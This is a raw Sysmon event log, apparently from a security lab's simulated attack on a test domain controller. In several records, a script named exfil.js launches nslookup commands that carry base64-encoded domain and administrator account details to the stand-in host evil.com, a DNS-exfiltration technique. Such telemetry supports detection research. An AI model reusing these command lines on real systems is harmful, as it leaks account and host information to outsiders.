14:16:33.330{2E1864BB-17C1-629A-AC40-000000005F02}2316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-AA40-000000005F02}7644C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwgx.tmp 2>&1 10341000x8000000000000000200964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.267{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-AB40-000000005F02}4200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.267{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-AB40-000000005F02}4200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.249{2E1864BB-17C1-629A-AB40-000000005F02}42007960C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-AA40-000000005F02}7644C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.233{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-AB40-000000005F02}4200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.218{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-AA40-000000005F02}7644C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.218{2E1864BB-17A1-629A-783D-000000005F02}55521104C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-AA40-000000005F02}7644C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.230{2E1864BB-17C1-629A-AA40-000000005F02}7644C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwgx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000200953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.767{00000000-0000-0000-0000-000000000000}2632<unknown process>-udpfalsefalse127.0.0.1-52733-false127.0.0.1-53domain 354300x8000000000000000200952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.683{00000000-0000-0000-0000-000000000000}7320<unknown process>-udpfalsefalse127.0.0.1-52731-false127.0.0.1-53domain 354300x8000000000000000200951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.592{00000000-0000-0000-0000-000000000000}7460<unknown process>-udptruefalse127.0.0.1-52729-false127.0.0.1-53domain 354300x8000000000000000200950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.591{00000000-0000-0000-0000-000000000000}7460<unknown process>-udpfalsefalse127.0.0.1-52728-false127.0.0.1-53domain 354300x8000000000000000200949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.591{00000000-0000-0000-0000-000000000000}7460<unknown process>-udptruefalse127.0.0.1-52728-false127.0.0.1-53domain 23542300x8000000000000000200948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.218{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbcwy.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-17C1-629A-A840-000000005F02}76044924C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-A940-000000005F02}5956C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A940-000000005F02}5956C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.179{2E1864BB-17C1-629A-A740-000000005F02}66886224C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-A940-000000005F02}5956C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.185{2E1864BB-17C1-629A-A940-000000005F02}5956C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-A740-000000005F02}6688C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbcwy.tmp 2>&1 10341000x8000000000000000200939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.149{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-A840-000000005F02}7604C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.149{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-A840-000000005F02}7604C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.149{2E1864BB-17C1-629A-A840-000000005F02}76044924C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-A740-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.133{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A840-000000005F02}7604C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.117{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A740-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.117{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.117{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.117{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.117{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 